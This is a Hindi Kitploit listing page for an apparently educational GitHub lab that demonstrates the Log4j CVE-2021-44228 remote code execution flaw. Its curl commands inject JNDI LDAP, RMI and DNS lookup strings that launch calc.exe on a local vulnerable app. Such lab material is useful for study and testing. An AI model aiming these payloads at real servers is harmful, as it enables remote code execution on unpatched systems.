Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-cve-2021-44228 — # Log4j CVE-2021-44228 उदाहरण: रिमोट कोड निष्पादन (LDAP, RMI, ... के माध्यम से), जबरन DNS क्वेरी, ... | Kitploit
उपकरण/GitHubGitHub/manuel-alvarez-alvarez/log4j-cve-2021-44228
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubmanuel-alvarez-alvarez/log4j-cve-2021-44228

log4j-cve-2021-44228

# Log4j CVE-2021-44228 उदाहरण: रिमोट कोड निष्पादन (LDAP, RMI, ... के माध्यम से), जबरन DNS क्वेरी, ...

रिपॉजिटरी देखें
5124 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Log4j CVE-2021-44228 और CVE-2021-45046

आवश्यकताएँ

एक असुरक्षित JDK का उपयोग करें, उदाहरण के लिए JDK 1.8.0_181

उपयोग

दुर्भावनापूर्ण सर्वर

दुर्भावनापूर्ण सर्वर निम्नलिखित एंडपॉइंट तैनात करता है:

  • 1389 LDAP सर्वर
  • 1099 RMI सर्वर
  • 8081 HTTP सर्वर
root@kitploit:~
./gradlew :malicious-server:bootRun

असुरक्षित एप्लिकेशन

असुरक्षित एप्लिकेशन 8082 पर एक HTTP एंडपॉइंट तैनात करता है

root@kitploit:~
./gradlew :vulnerable-app:bootRun

दूरस्थ कोड निष्पादन

एक पेलोड चुनें जिसे असुरक्षित एप्लिकेशन द्वारा निष्पादित किया जाएगा और उसे Base64 में एन्कोड करें। उदाहरण के लिए, कैलकुलेटर खोलने के लिए विंडोज़ में: calc.exe

LDAP

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:ldap://localhost:1389/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

RMI

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:rmi://localhost:1099/payload/Log4j/Y2FsYy5leGU=}" http://127.0.0.1:8082/

DNS क्वेरीज़

root@kitploit:~
curl --header "X-Vulnerable-Header: ${jndi:dns://8.8.8.8/google.es}" http://127.0.0.1:8082/
टूल डाउनलोड करें